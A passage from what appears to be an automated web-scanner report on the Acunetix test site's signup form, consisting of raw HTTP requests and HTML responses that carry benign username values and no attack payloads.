value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	tbUsername
Attack
Evidence
Show / hide Request and Response
Request Header - size: 579 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1062 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Signup.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,062 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=qDfEfqbw&tbPassword=&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:44 GMT Content-Length: 13287
Response Body - size: 13,287 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BSxZb3UgbmVlZCB0byBlbnRlciBhIHVzZXJuYW1lIGFuZCBhIHBhc3N3b3JkIR8CZ2RkZLCqa4FNGDvFa7Lbgd5xkWxCmNtO" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgKXjqjGAwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEbWZKkh8Zp+FA94XTXUeb/tBRU3" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="qDfEfqbw" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">You need to enter a username and a password!</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	tbUsername
Attack
Evidence
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" 